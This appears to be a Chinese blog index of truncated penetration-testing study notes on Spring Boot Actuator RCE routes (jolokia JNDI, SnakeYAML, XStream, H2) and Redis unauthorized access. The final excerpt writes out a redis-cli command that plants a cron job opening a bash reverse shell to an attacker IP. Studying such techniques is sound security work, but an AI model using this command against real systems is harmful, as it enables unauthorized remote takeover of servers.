前言：jolokia Realm JNDI RCE 学习笔记 参考文章：https://static.anquanke.com/download/b/security-geek-2019-q1/article-10.html 有个疑问点还是不太懂，因为Tomcat是SpringBoot内嵌 ...

一、漏洞成因： 　　spring cloud在低版本下的 SnakeYAML 依赖组件存在反序列漏洞（所以有的利用叫：springcloud-snakeyaml-rce） 二、利用条件　　 　　Spring boot版本范围： 　　　　Spring Boot 2.X 　　 全部 ...

前言：jolokia logback JNDI RCE 漏洞学习笔记 在实战中碰到的几率还是有的，不过有时候不存在相关可利用的依赖，有时候不存在相关可利用的MBean，总是会觉得可惜... 这里不讲述相关的jolokia的MBean使用方法，如果需要的话可以去学习下 参考文章：https ...

一、漏洞成因 　　spring-cloud-starter-netflix-eureka-client组件使用 Xstream 序列化功能，在一定条件下触发REC。 　　（XStream：XStream是Java类库，用来将对象序列化成XML （JSON）或反序列化为对象。） 二、利用条件 ...

一、漏洞成因 　　env接口暴露 　　使用h2 database 依赖 二、利用条件 　　env接口 　　restart接口 　　存在 com.h2database.h2 依赖 三、漏洞确认 　　访问env接口，查看是否存在h2 database相关依赖 　　 四、漏洞 ...

日穿扫描扫到一个spring boot actuator 可以看到有jolokia这个端点，再看下jolokia/list，存在type=MBeanFactory 关键字 可以使用jolokia-realm-jndi-rce具体步骤如下 先用python3开一个web服务 编译 ...

请遵守网络安全法！！！本文仅供学习交流使用！用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关！读者自行承担其恶果！ EXP 来源 ...

　　未授权无需认证访问内部数据库。 利用计划任务反弹shell redis-cli -h 192.168.2.6 set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n" config ...